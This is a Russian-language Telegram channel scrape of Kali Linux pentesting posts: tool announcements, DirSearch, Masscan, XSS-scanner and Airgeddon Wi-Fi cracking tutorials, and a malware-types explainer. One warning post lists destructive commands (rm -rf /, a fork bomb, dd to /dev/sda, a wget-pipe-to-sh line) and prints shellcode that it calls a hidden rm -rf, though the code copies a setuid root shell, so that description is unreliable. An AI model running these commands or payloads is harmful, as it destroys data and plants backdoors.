Kali Linux
53.7K subscribers
1.05K photos
74 videos
13 files
1.09K links
@linux_kal наш чат

По всем вопросам- @workakkk

@ai_machinelearning_big_data - машинное обучение

@itchannels_telegram - 🔥 главные ресурсы для хакера

@programming_books_it - бесплатные it книги

@pythonl -🐍

РКН: clck.ru/3Fmszy
Download Telegram
📡 Athena OS

Athena OS - дистрибутив Linux для cпецов по информационной безопасности, охотников за ошибками, пантестеров и хакеров. Отличный инструмент для пентестинга.

#Linux #Pentest #Arch

🖥 Github

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
👍3015🔥2
🔏 Контрольный список безопасности API

Чеклист наиболее важных контрмер по безопасности при разработке, тестировании и выпуске вашего API.

🖥 Github

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
👍198🔥2
🚀 Шпаргалка Kali Linux

SQLMap Examples
Metasploit
Exploit Research
Password Cracking
Username Enumeration
HTTP / HTTPS Webserver Enumeration
DNSRecon
NMAP Commands и д.р

#linux #pentest #github

@linuxkalii
👍387🔥3👎2😱1
🖥 Список опасных команд Linux.

Командная строка Linux — очень продуктивная, полезная и интересная, но иногда она может быть очень опасной, особенно когда вы не уверены, что вы делаете. Для некоторых команд в командной строке вы должны перепроверить синтаксис дважды, прежде чем нажмёте Enter.

Команда rm -rf
Команда rm -rf — это один из самых быстрых способов удалить каталог и его содержимое. Но небольшая опечатка или незнание могут привести к непоправимому разрушению системы. Некоторые опции, используемые с командой rm.

rm в Linux используется для удаления файлов.
Команда rm -r удаляет каталог рекурсивно, даже если он непустой.
Команда rm -f удаляет файлы без запроса файлы ‘Только для чтения’.
rm -rf / : Принудительное удаление всего в корневой директории.
rm -rf * : Принудительное удаление всего в текущей/рабочей директории.
rm -rf . : Принудительное удаление всего в текущей директории и поддиректориях.

Следовательно, нужно быть осторожным, когда вы выполняете команду rm -rf. Чтобы обойти несчастные случаи с удалением файлов командой ‘rm‘, сделайте псевдоним (алиас) команды с параметром rm -i в файле “.bashrc”, после этого всегда будет появляться запрос при любому удалении.

Команда :(){ :|:& };:
В действительности эта команда является логической бомбой. Она оперирует определением функции с именем ‘:‘, которая вызывает сама себя дважды: один раз на переднем плане и один раз в фоне. Она продолжает своё выполнение снова и снова, пока система не зависнет.


:(){ :|:& };:
Команда > /dev/sda

Вышеприведённый пример пишет вывод «команды» в блок /dev/sda. Вышеприведённая команда пишет сырые данные и все файлы в блоке будут заменены сырыми данными, это станет причиной полной потери данных блока.

mv folder /dev/null
Команда mv переместит ‘folder‘ в /dev/null. В Linux /dev/null или null устройство — это специальный файл, который сбрасывает все данные, записанные в него, и сообщает, что операция записи прошла успешно.

# mv /home/user/* /dev/null
Вышеприведённая команда переместит всё содержимое пользовательских директорий user в /dev/null, что фактически является переносом всех данных в чёрную дыру (null).

wget http://malicious_source -O- | sh
Этот пример wget загрузит скрипт из вредоносного источника и выполнитего

mkfs.ext3 /dev/sda
Этот пример отформатирует ‘sda’. После выполнения данной команды ваш жёсткий диск будет помечен как «Новый». Вы останетесь без каких либо данных и с системой не подлежащей восстановлению.

> file
Эта команда используется для стирания текущего файла. Если эта команда будет выполнена с опечаткой или незнанием вроде “> xt.conf”, то это сотрёт конфигурационный или любой другой файл.

Это распространённая ошибка начинающих пользователей командной строки, когда они путают символы | (труба) и > (перенаправление вывода).

Например, вот так правильно:

echo 456 | grep -E '[0-9]'
А вот так вы затрёте бинарный файл:


echo 456 > grep -E '[0-9]'
^foo^bar

Эта команда используется для редактирования предыдущей запущенной команды без необходимости снова заново печатать всю команду. Это может быть действительно опасно.

dd if=/dev/random of=/dev/sda
Эта dd сотрёт блок устройства sda и заполнит его рандомным мусором. Система будет неработоспособной.

Скрытая команда
Команда ниже — это ничего более как rm -rf. Эта команда спрятана в шестнадцатеричную запись и пользователь может быть одурачен и запустить её. Запуск этого кода сотрёт ваш корневой раздел. Эта команда показывает здесь, что опасность может быть спрятана и иногда её трудно выявить.

char esp[] __attribute__ ((section(“.text”))) /* e.s.p
release */
= “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68″
“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99″
“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7″
“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56″
“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31″
“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69″
“\x6e\x2f\x73\x68\x00\x2d\x63\x00″
“cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;”;


@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
👍4712🔥7
🏷ASNMAP

Полезная библиотека на Go для сбора сетевых диапазонов по ASN организации.

🖥 GitHub

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
👍227🔥2
​​💣XSS уязвимости на примере Ч. 3

В этом посте я постараюсь объяснить что такое XSS на основе dom.

Что такое DOM?

DOM расшифровывается как D ocument O bject M odel и представляет собой программный интерфейс для документов HTML и XML. Он представляет собой страницу, так что программы могут изменять структуру, стиль и содержимое документа. Веб-страница - это документ, и этот документ может отображаться в окне браузера или в качестве источника HTML.

Использование DOM
XSS на основе DOM - это место, где выполнение JavaScript происходит непосредственно в браузере без загрузки каких-либо новых страниц или передачи данных в серверный код. Выполнение происходит, когда код JavaScript веб-сайта воздействует на ввод или взаимодействие с пользователем.

Пример сценария:
JavaScript веб-сайта получает содержимое из window.location.hash параметра и затем записывает его на страницу в просматриваемом в данный момент разделе. Содержимое хэша не проверяется на наличие вредоносного кода, что позволяет злоумышленнику внедрить JavaScript по своему выбору на веб-страницу.


Возможное воздействие:
созданные ссылки могут быть отправлены потенциальным жертвам, перенаправляя их на другой веб-сайт или украдя контент со страницы или сеанса пользователя.

Как протестировать XSS на основе Dom:
XSS на основе DOM может быть сложной задачей для тестирования и требует определенных знаний JavaScript для чтения исходного кода. Вам нужно будет искать части кода, которые обращаются к определенным переменным, над которыми злоумышленник может иметь контроль, например, к параметрам « window.location.x ».

▪️1 часть
▪️2 часть

@linuxkalii
👍237🔥6
↗️ Ниже приведены некоторые из наиболее часто используемых команд Kali Linux:

1. "ls" - Перечислить файлы и каталоги в каталоге
2. "cd" - Изменить текущий рабочий каталог
3. "pwd" - Вывести текущий рабочий каталог.
4. "sudo" - Выполнить команду с привилегиями администратора
5. "apt-get update" - Обновить индекс пакетов
6. "apt-get upgrade" - Обновить установленные пакеты
7. "ifconfig" - Показать информацию о сетевых интерфейсах
8. "iwconfig" - Показать информацию о беспроводных сетевых интерфейсах
9. "ping" - Отправить пакеты на сетевой узел и измерить время отклика.
10. "nmap" - Сканировать сеть на наличие открытых портов и служб.
11. "msfconsole" - Запуск консоли Metasploit Framework
12. "airmon-ng" - Запуск и остановка мониторинга беспроводных сетевых интерфейсов
13. "aireplay-ng" - Воспроизведение трафика беспроводной сети.
14. "iptables" - Настройка брандмауэра ядра Linux для фильтрации

Superuser (cуперпользователь)

"Superuser" - это учетная запись привилегированного пользователя в операционных системах на базе Unix, таких как Kali Linux, которая имеет неограниченный доступ ко всем файлам, каталогам и системным ресурсам. Учетная запись суперпользователя обычно называется "root" и имеет идентификатор пользователя 0.

Superuser имеет возможность выполнять любые действия в системе, включая изменение системных файлов, установку программного обеспечения и изменение конфигурации системы.

Это делает учетную запись суперпользователя мощным инструментом, но также и потенциальным риском безопасности. Поэтому обычно рекомендуется избегать регулярного входа в учетную запись суперпользователя и использовать ее только в случае необходимости. Вместо этого для повседневной работы следует использовать учетную запись обычного пользователя с ограниченными привилегиями.

Мы будем использовать эти команды в следующих постах, чтобы использовать Kali Linux на полную мощность.

#Junior

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
👍3211🔥3
📂 Специализированная файловая система proc

Файловая система proc является важным источником информации о вашей Linux-системе, который ни в коем случае нельзя игнорировать.

Proc является псевдо- или виртуальной файловой системой, которая предоставляет пользователям доступ к внутренним структурам ядра Linux.

Иначе говоря, proc не является реальной файловой системой в обычном смысле; она располагается исключительно в оперативной памяти. При этом она автоматически монтируется системой.

Ниже приведены важные файлы, относящиеся к процессам

Вы можете использовать следующие файлы файловой системы proc для получения информации об отдельных процессах:

/proc/$pid/cmdline — содержит параметры командной строки, переданные на этапе запуска процесса
/proc/$pid/cwd — является символьной ссылкой на текущую рабочую директорию процесса
/proc/$pid/environ — содержит переменные окружения, заданные на этапе запуска процесса
/proc/$pid/exe — является символьной ссылкой на исполненный бинарный файл
/proc/$pid/fd — поддиректория с символьными ссылками на файлы, открытые процессом
/proc/$pid/io — содержит статистику операций ввода/вывода процесса
/proc/$pid/limits — содержит информацию о лимитах использования ресурсов процессом
/proc/$pid/maps — содержит информацию об отображенных регионах памяти и правах доступа к ним
/proc/$pid/stack — содержит трассировку вызовов функций в рамках стека ядра
/proc/$pid/stat — содержит статистику использования ресурсов процессом
/proc/$pid/task/ — является директорией с информацией о программных потоках

Важные файлы, относящиеся к системе
А это список важных файлов, не относящихся к отдельным процессам:

/proc/cmdline — содержит аргументы, переданные ядру Linux
/proc/cpuinfo — содержит информацию о центральном процессоре
/proc/meminfo — содержит информацию об оперативной памяти
/proc/filesystems — содержит информацию о поддерживаемых ядром файловых системах
/proc/modules — содержит информацию о загруженных модулях ядра
/proc/partitions — содержит информацию дисковых разделах
/proc/swaps — содержит информацию о пространстве подкачки
/proc/self — содержит информацию о процессе, работающем с файловой системой proc
/proc/slabinfo — содержит информацию о кэшах ядра Linux
/proc/sys — содержит различные файлы и поддиректории, отражающие значения внутренних переменных ядра Linux

Где найти дополнительную информацию?
Данный пост содержит описание лишь некоторых элементов файловой системы proc. Дополнительная информация доступна на странице руководства proc, доступ к которой может быть послучен после исполнения команды man proc или после перехода по следующей ссылке.

#Junior

@linuxkalii
18👍12🔥2👎1😢1
Этичный хакинг с Kali Linux. Часть 2. Фазы атаки

Данная статья не будет содержать никаких практических примеров, и ее прочтение не займет у тебя много времени. Однако, без нее двигаться дальше будет так же бессмысленно, как и смотреть фильм в котором пропущен очень важный эпизод, несущий в себе смысл понимания происходящего во всей картине.

Тут мы затронем такую важную тему, как фазы атаки. Разберем стратегию действий атакующего шаг за шагом, для того, чтобы лучше понимать как проводить тестирования на проникновение эффективно и максимально приближенно к действиям злоумышленника.

Типы кибератак.

Условно все кибератаки можно разделить на два типа:

Массовые хакерские атаки — это создание ботнетов, распространение вредоносного ПО, почтовый спам и т. д. Чаще всего подобные атаки организуются любителями-энтузиастами, либо начинающими скрипт-кидди злоумышленниками.

Целевые атаки — любая атака на конкретную инфраструктуру (это те самые атаки, за которыми в статьях на «Хакере» стоят три магические буквы APT).

За подобного рода атаками обычно стоит группа опытных кибепреступников, которые используют и применяют самый полный спектр различных методик, приемов и инструментов для обхода всех стандартных средств защиты и получения доступа к целевым ресурсам.

Вполне логично предположить, что все подобные атаки должны иметь четкий план (сценарий атаки), представляющий из себя описание последовательности основных действий для достижения цели (фазы атаки).

Количество фаз может разниться, в зависимости от сценариев используемых атакующей стороной, но есть 4 основных фазы, которые присутствуют практически во всех видах атак:

1) футпринтинг (footprinting) или разведка - первоначальный сбор всей возможной информации о цели, как из открытых источников в сети Интернет, так и при помощи методов социальной инженерии и специальных инструментов (различных сканеров);

2) получение доступа к ресурсу (имея точные данные о том какие сервисы либо сетевые устройства используются в организации, можно попытаться найти уязвимости в этих системах. Яркий пример — APT атаки на правительственные сети в США в 2020 году, когда хакеры, стоявшие за этими атаками эксплуатировали уязвимости в VPN-серверах Fortinet и уязвимость Netlogon в Windows Server);

3) сохранение доступа (после получения доступа к целевой системе, злоумышленнику необходимо закрепиться в ней, на случай, если уязвимость которой он воспользовался будет закрыта. Для этого он может затроянить систему, чтобы сохранить к ней доступ);

4) сокрытие следов (любая современная система имеет на борту электронный журнал логирования всех выполняемых на ней действий. Отсюда следует, что в нем может сохраниться IP адрес с которого злоумышленник сканировал ресурсы сети или еще какая информация, которая может его разоблачить или дать понять техническому персоналу атакуемой компании, что их взломали).

Рассмотрим каждую фазу подробнее.

Футпринтинг (footprinting) или разведка — самая первая фаза планирования и подготовки к атаке, где главной задачей злоумышленника является сбор как можно большего количества информации о цели. Здесь можно выделить активный и пассивный подходы.

Пассивным подходом можно назвать обычное исследование цели путем сбора информации из открытых источников в Интернете либо методом социальной инженерии (познакомиться с сотрудником компании и попытаться выудить из него какую-то информацию).

К активному подходу можно отнести сканирование злоумышленником цели при помощи набора специальных инструментов (сетевые сканеры портов, сканеры уязвимостей системы);

Получение доступа к ресурсу. Тут может быть несколько вариантов.

Самый популярный — эксплуатация известной уязвимости в ПО сетевого оборудования либо операционной системы (подробнее эту тему мы рассмотрим позже). Так же, кроме получения доступа тут может быть сценарий дефейса (вывода из строя) ресурса атаками типа DoS/DDoS (доведение сервиса до отказа) при котором злоумышленнику совсем не обязательно получать доступ к системе;

@linuxkalii
👍2110🔥3👎1
Мы собрали для вас подборку свежих и актуальных книг, по всем языкам программирования.

В подборке не просто новые книги для программистов, но и те книги, которые дают практическую основу с задачами и решениями для получения реального полезных навыков.

🍍 Папка с книгами:
https://t.me/addlist/BkskQciUW_FhNjEy

Я подписан на многие каналы из подборки, но не на все, так что будет из чего выбрать – от глубоко технических авторов, до понятных всем и тп.

Настоящий кладезь книг и знаний здесь
8👍7🔥3🤔2
Учебное пособие по тестированию на проникновение в Kali Linux: пошаговый процесс

В этом году Kali Linux исполняется 10 лет, и чтобы отпраздновать это событие, дистрибутив Linux для тестирования на проникновение добавил средства защиты в свой арсенал инструментов безопасности с открытым исходным кодом.

Знакомы ли вы с данным дистрибутивом? Знаете ли вы о наборе инструментов для пентестинга, который он включает? А как корректно использовать Kali знаете? Обо всём этом и не только вы сможете прочитать в данной статье!

Читать

@linuxkalii
19👍13🔥6😁1
🔎 Работа с сканером DirSearch на Kali Linux

В этом посте рассмотрим простой, но эффективный инструмент для брута каталогов и файлов сайта на Python, который называется DirSearch. Это довольно популярный инструмент для взлома сайтов, который работает намного быстрее, чем установленный в Kali и DIRB.

Сам сканер DirSearch уже установлен в полной версии kali-linux-full. Если вы используете легкую версию, то команда для установки:

sudo apt install dirsearch -y

После установки, по традиции открываем и изучаем хелп:

dirsearch -h

В качестве примера будем использовать google.com:


dirsearch -u google.com -e aspx,php

В данном случае, используя параметр -u, я указал адрес целевого сайта и с помощью параметра -e произвел поиск файлов php и aspx.

Время работы зависит от размера целевого сайта. После завершения, появится сообщение «Task Completed».

Dirsearch может сохранить результат в файл txt, json, xml, md и csv. По умолчанию используется txt.

Для подробной информации рекомендуем посмотреть официальный репозиторий GitHub.

🖥 Github

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
👍218🔥2
🔎 Правильное использование Masscan на Kali Linux

Что такое Masscan
Этот самый быстрый сканер портов дает результат, аналогичный Nmap, но Masscan работает как Unicornscan, внутри Zenmap (асинхронное сканирование). Это быстрее из-за гибкости, допускающей произвольные диапазоны и диапазоны портов.

Masscan использует собственный стек TCP/IP. Все, кроме простого сканирования портов, может вызвать конфликт с локальным стеком TCP/IP.

Установка Masscan на Linux
Masscan установлен в полной версии Kali Linux. Мы можем проверить основные варианты использования, выполнив команду:

masscan

Если в системе не установлен Masscan, тогда установите зависимости:


sudo apt-get install clang git gcc make libpcap-dev

И применив следующую команду, установите Masscan с помощью:

sudo apt-get install masscan

Или клонировать репозиторий GitHub.

git clone https://github.com/robertdavidgraham/masscan

cd masscan

sudo make


Как пользоваться Masscan

Masscan используется для сканирования сети, если необходимо просканировать только один порт:

sudo masscan 172.217.167.46 -p443

Команда выше начнет сканировать один порт 443.

Также можно использовать инструмент для сканирования нескольких портов, разделенных запятой (,):

sudo masscan 172.217.167.46 -p443,80,4444

Использование Masscan. Сканирование портов masscan

Для сканирования диапазона портов:

sudo masscan 172.217.167.46 -p12-443

Приведенная выше команда будет сканировать порт с 12 по 443.

Для сканирования всех портов:

sudo masscan 172.217.167.46 -p0-65535

Использование Masscan на полную катушку

Я говорил, что Masscan — самый быстрый сканер, но после выполнения предыдущих команд я не почувствовал, что он работает быстрее.

Причина в том, что Масскан, по умолчанию, сканирует со скоростью 100 пакетов в секунду (медленно). Чтобы увеличить скорость, нужно использовать параметр --rate:

sudo masscan 172.217.167.46 -p0-65535 --rate 25000000


Выполнив эту команду, мы сможем достичь максимальной скорости (25 миллионов пакетов в секунду).

Но имейте в виду. Скорость сканирования зависит от ОС. Вы не сможете разогнать сканер до максимальной скорости на системах Mac, Windows или на виртуальной машине Linux. Максимальная скорость при использовании ОС отличных от Linux — 300 000 пакетов в секунду.

Также скорость сканирования зависит подключение к Интернету.

В небольших сетях или при скандировании одного IP вы не заметите большую разницу. Чтобы увидеть весь потенциал инструмента, необходимо сканировать большую сеть.

По словам автора Роберта Грэма, Masscan может просканировать весь Интернет за 6 минут. Если мы хотим сканировать весь Интернет на наличие определенного порта (например, 443):

sudo masscan 0.0.0.0/0 -p443 --rate 250000000 --exclude 255.255.255.255

Как пользоваться Masscan. Сканирование интернет

Вот как можно найти конкретный уязвимый порт во всей сети Интернет.

Другое использование Masscan на Kali Linux
Чтобы сохранить результат вывода в файл, используйте команду:

sudo masscan 172.217.167.46 -p0-65535 > example.txt

Можно сохранять результат не только в формате txt, но и в форматах XML ( -oX), Grepable ( -oG) и JSON ( -oJ). Из-за совместимости с другими инструментами, я предпочитаю формат Grepable.

Если добавить параметр ‐top-ports 100, он будет сканировать 100 самых распространенных портов, обнаруженных в соответствии с Nmap:

sudo masscan 172.217.167.46 --top-ports 100 --rate 100000

@linuxkalii
👍284🔥2👎1🥰1
Что такое Дроппер Загрузчик и Вайпер

Задача команды Red Team заключается в получении доступа к компьютеру или мобильному устройству жертвы.

Существует множество способов доставки и запуска вредоносной программы на целевой машине. Новички в области информационной безопасности часто путают понятия Дропперы и Загрузчики. В данном посте будет рассказано, что такое Дроппер, Загрузчик и Вайпер, и чем они отличаются друг от друга. Поехали!

Что такое Дроппер, Загрузчик и Вайпер
Дроппер


Дроппер - это полезная нагрузка, которая устанавливает вредоносные программы на целевое устройство. Вредоносные инструменты включены в саму полезную нагрузку, поэтому вредоносное ПО не использует внешнюю инфраструктуру для их загрузки.

Дропперы больше похожи на полезные нагрузки Meterpreter без сохранения состояния, в которых весь код эксплойта заключен в один исполняемый файл. Поскольку все инструменты включены в один файл, итоговый размер файла полезной нагрузки может быть большим.

Загрузчик - это полезная нагрузка, которая загружает дополнительные вредоносные программы на целевое устройство. Вайпер - это полезная нагрузка, которая удаляет все данные на целевом устройстве. Дропперы имеют больший размер, чем загрузчики и вайперы. Загрузчики загружают дополнительное вредоносное ПО из инфраструктуры, контролируемой злоумышленниками, тогда как дропперы уже содержат вторичное вредоносное ПО в полезной нагрузке. Вайперы уничтожают все данные на целевом устройстве.

Загрузчик
Загрузчик - это полезная нагрузка, которая загружает дополнительные вредоносные программы на целевое устройство.

Загрузчики похожи на полезную нагрузку Meterpreter, которая при выполнении вызывает прослушиватель Meterpreter, контролируемый злоумышленником, для загрузки дополнительных возможностей. Это делает загрузчики намного меньше по размеру по сравнению с Дропперами и отлично подходят в сценариях, где размер полезной нагрузки имеет значение.

Вайпер
Вайпер (Wiper)
— это полезная нагрузка, которая полностью удаляет (уничтожает) все данные на носителе целевого устройства. Это, пожалуй, самый разрушительный тип полезной нагрузки, который обычно используется военными в качестве кибероружия. Пример — нашумевший Вайпер NotPetya, который использовался для уничтожения данных примерно на 50 000 компьютерах в Украине в 2017 году.

Чем отличаются Дроппер, Загрузчик и Вайпер

Дропперы имеют большие размеры по сравнению с загрузчиками и вайперами.

Загрузчики загружают дополнительное вредоносное ПО из инфраструктуры, контролируемой злоумышленниками, тогда как дропперы уже содержат вторичное вредоносное ПО в полезной нагрузке.

Вайперы уничтожают, либо шифруют, либо перезаписывая все данные на целевом устройстве. Вторичной полезной нагрузкой загрузчика или дроппера может быть Вайпер.

Мы разобрались с Дропперами, Вайперами и Загрузчиками. В следующем посте мы продолжим эту тему.

@linuxkalii
👍215👎1🥰1
Kali Linux не видит Wi-Fi адаптер

Что делать, когда Kali Linux не видит Wi-Fi адаптер. Данная проблема часто появляется при подключении адаптера WiFi к стационарному ПК.

Для решения этой проблемы необходимо какое-то временное подключение к сети для скачивания и установки драйвера. Большая часть ноутбуков работает с драйверами Broadcom. Чтобы облегчить установку драйвера Broadcom будем использовать скрипт Broadcom.

Итак, мы подключились к сети используя другой адаптер или кабель LAN. Теперь откройте терминал и обновите Kali Linux с помощью команды apt update:

sudo apt-get update

Вам потребуется пароль root.

После обновления используйте команду git clone для клонирования скрипта Broadcom.

git clone https://github.com/mehedishakeel/BroadcomInstaller2017

После клонирования переходим в папку с помощью команды cd:

cd BroadcomInstaller2017

Затем перед запуском скрипта bash, с помощью следующей команды, изменяем права доступа:

sudo chmod +x Broadcom.sh

Теперь запускаем скрипт bash:


sudo bash Broadcom.sh

Выбираем первый пункт (1) Install WiFi Driver (Установить драйвер WiFi).

Kali Linux не видит Wi-Fi адаптер

Установка драйвера Broadcom для Wi-Fi адаптера на Kali Linux займет некоторое (зависит от вашего ПК и скорости интернета).

После завершения установки скрипт перезагрузит компьютер. Так что не пугайтесь, если компьютер перезапустится сам автоматически.

После загрузки Kali Linux вы должны увидеть в правом верхнем углу иконку подключения по Wi-Fi. Теперь можете подключиться к сетям WiFi.

@linuxkalii
👍196🔥3👎1
👣 AlterX

Инструмент, написанный на Go для сбора поддоменов через перестановки и комбинирование слов. Поможет автоматически создавать перестановки слов, а также поможет создавать свои собственные шаблоны для работы.

🖥 Github
⭐️ Инструкция

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
👍137🔥4👎1
🎯Автоматизация поиска XSS уязвимостей

Учавствуя в программе вознаграждения Баг Баунти, часто приходится искать XSS-язвимости сайтов. Сегодня обсудим несколько полезных инструментов для автоматизация поиска XSS-уязвимостей в веб-приложениях.

Автоматизация поиска XSS уязвимостей
В качестве цели, чтобы не нарушать закон, будем использовать специально предназначенный для этого уязвимый сайт:

http://testphp.vulnweb.com/

Итак, рассмотрим лучшие инструменты для автоматизация поиска XSS-уязвимостей в веб-приложениях.

⚠️ Bug Bounty — это программа, которую владелец сайта проводит для привлечения сторонних специалистов к поиску уязвимостей. При участии в программе Баг Баунти нужно действовать этично и придерживаться установленных правил. Не стоит забывать, что несанкционированный взлом является незаконным и расценивается, как уголовное преступление.

Это инструмент Python, который используется для поиска параметров сайта в веб-архиве без взаимодействия с хостом. Для поиска параметров, ParamSpider использует различные методы и списки слов.

Тулза будер полезна при поиске XSS, SQL-инъекций, SSRF и уязвимостей Open Redirect.

Установка Paramspider
Для установки Paramspider, используйте следующие команды:

git clone https://github.com/devanshbatham/ParamSpider
cd ParamSpider
pip3 install -r requirements.txt


Если не получается установить, убедитесь, что у вас установлен Python 3 и Git.

Использование Paramspider
Для поиска XSS, выполняем команду:


python3 paramspider.py --domain http://testphp.vulnweb.com/ -o /home/media/vuln.txt


Эта команда запускает сценарий Python и сканирует цель. Полученные результаты сохраняет в текстовый файл.

Официальная страница Paramspider на GitHub:

https://github.com/devanshbatham/ParamSpider

Kxss
Ищет XSS на основе результатов найденных параметров из Waybackurls или Burp.

Установка Kxss
Для работы программы, необходимо установить Golang.

Для установки, используем команду:

go get github.com/Emoe/kxss

Использование Kxss
Вы можете запустить скрипт подсунув файл найденных параметров Paramaspider:

cat vuln.txt | kxss

Официальная страница Kxss на GitHub:

https://github.com/Emoe/kxss

Dalfox
DalFox — это мощный инструмент для поиска XSS., Также анализатор параметров и утилита, которые ускоряют процесс обнаружения XSS.

Основная концепция заключается в анализе параметров, поиске XSS и проверке их на основе синтаксического анализатора DOM.

Установка Dalfox
Можно установить Dalfox с помощью snap:

snap install dalfox

Использование Dalfox
Чтобы запустить скрипт и найти XSS-уязвимости на сайте, выполните команду:

cat vuln.txt | kxss | dalfox pipe

Как мы видим, инструмент возвращает страницы со скрытыми параметрами (Reflected parameters).

Можно подсунуть полезную нагрузку:

Официальная страница Dalfox на GitHub:

https://github.com/hahwul/dalfox

Он-лайн сервис для поиска XSS уязвимостей
Можно также использовать онлайн-сервис pentest-tools.com/website-vulnerability-scanning/xss-scanner-online, который позволяет найти XSS веб-приложения, не устанавливая при этом никаких дополнительных инструментов. Просто вводите URL и получаете результат.

@linuxkalii
12👍11🔥3👎1
🔍 Detect-It-Easy

Инструмент для анализа исполняемых файлов для Windows, Linux и macOS

После открытия исполняемого файла в Detect it Easy покажет чем файл был сжат, каким компилятором был создан файл, размеры и названия секций, коэффициент сжатия, точку входа, а также проверить файл на VirusTotal.

Github

@linuxkalii
👍196🔥2👎1
💻 Airgeddon

Airgeddon — это многофункциональный инструмент для взлома Wi-Fi. Автор тулзы — v1s1t0r1sh3r3.

Возможности Airgeddon:

Быстрое переключение между режимами работы адаптера.
DoS через беспроводные сети разными методами (mdk3, mdk4, aireplay-ng).
Полная поддержка диапазонов 2,4 ГГц и 5 ГГц.
Оптимизация захваченных файлов рукопожатий (Handshake).
Автономная расшифровка паролей в захваченных файлах WPA/WPA2 (Handshake и PMKID), с использованием словаря, брута и атак на основе правил, с помощью инструментов aircrack, crunch и hashcat.

Атаки Evil Twin (поддельная точка доступа)
Только режим Rogue/Fake AP для прослушивания с использованием внешнего анализатора (Hostapd + DHCP + DoS).
Простой встроенный сниффинг (Hostapd + DHCP + DoS + Ettercap).
Встроенный сниффинг, sslstrip2 (Hostapd + DHCP + DoS + Bettercap).
Интегрированный сниффинг, sslstrip2 и BeEF Browser Exploitation Framework (Hostapd + DHCP + DoS + Bettercap + BeEF).
Дополнительная подмена MAC-адреса для всех атак Evil Twin.

WPS-функции
WPS-сканирование.
Пользовательская ассоциация PIN-кода.
Атаки Pixie Dust.
Атаки методом перебора PIN-кода.
Атака с нулевым PIN-кодом (reaver).
Атака на известные PIN-коды WPS, основанная на онлайн-базе данных PIN-кодов.
Интеграция наиболее распространенных алгоритмов генерации PIN-кода (ComputePIN, EasyBox, Arcadyan и др.).
Генерация ПИН-кода в автономном режиме и возможность поиска цели в результатах ПИН-кода в базе данных.
Настраиваемые тайм-ауты для всех атак.

Атаки на корпоративные сети
Поддельная точка доступа, использующая «плавный» и «зашумленный» режимы, перехватывающая корпоративные хеши и простые пароли.
Создание сертификатов.

Атака WEP All-in-One (сочетание различных техник: Chop-Chop, Caffe Latte, ARP Replay, Hirte, Fragmentation, Fake Association и т. д.).
Совместимость со многими дистрибутивами Linux (см. раздел «Требования»).
Динамическое определение разрешения экрана и автоматический размер окон для оптимального просмотра.
Контролируемый выход. Очистка задач и временных файлов. Восстановление nftables/iptables после атаки, требующей внесения в них изменений. Возможность сохранить режим монитора при желании при выходе.
Многоязычная поддержка и функция автоматического определения языка ОС (см. раздел «Поддерживаемые языки»).
Подсказки меню, для удобства использования.
Автоматическое обновление. Скрипт проверяет наличие более новой версии, если это возможно.
Образ Docker для простого и быстрого развертывания контейнера. Можно использовать уже собранный образ на Docker Hub или собрать свой собственный.
Автоматическое определение HTTP-прокси для обновлений.
Поддерживается графическая система Wayland (не только система X Window).
Поддержка Tmux.
Полная совместимость с iptables и nftables с автоопределением и возможностью форсировать iptables путем установки опции.
Доступная система плагинов, позволяющая сообществу создавать свой собственный контент простым и гибким способом, используя созданную систему перехвата функций. Подробнее в разделе «Система плагинов».

Установка Airgeddon на Kali Linux
Airgeddon уже установлен в последних версиях Kali Linux. Если вы используете облегченную версию, то вот как его установить:


sudo apt-get install airgeddon

Приведенная выше команда запросит пароль root и права доступа к дисковому пространству. После этого будет установлен Airgeddon и некоторые зависимости.

Airgeddon также требует некоторых дополнительных инструментов. Для их установки выполните команду:


sudo apt install bettercap isc-dhcp-server hostapd hostapd-wpe udhcpd mdk4 hcxdumptool lighttpd hcxtools -y
Теперь, при наличии адаптера поддерживающего режим монитора и внедрение пакетов, можно начать использовать Airgeddon на Kali Linux.

Для взлома пароля WiFi можно использовать различные способы. Можно задействовать Airgeddon —> Offline WPA/WPA2 decrypt menu —> Personal > (aircrack + crunch) Bruteforce attack against Handshake/PMKID capture file или использовать aircrack-ng или онлайн-инструменты взлома хеша.

🖥 Github

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
👍298🔥5🤯2👎1
🗄 PeaZip

Эта бесплатная утилита предназначена для архивирования и извлечения файлов rar на Linux, macOS и Windows. Она поддерживает более 200 типов и типов архивов, включая 7z, ace, arc, bz2, cab, gz, iso, paq, pea, rar, tar, wim, zip, zipx и другие.

Проект предназначен для создания кросс-платформенного, портативного интерфейса с графическим пользовательским интерфейсом.


Github

@linuxkalii
🔥9👍65👎1